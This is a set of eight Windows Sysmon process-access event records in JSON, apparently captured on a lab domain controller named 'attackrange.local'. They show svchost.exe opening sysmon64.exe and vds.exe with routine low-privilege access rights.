{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1280,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1281,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1282,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1283,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.096\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nTargetProcessId: 3480\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.096","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","TargetProcessId":"3480","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1284,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1285,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1286,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1287,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
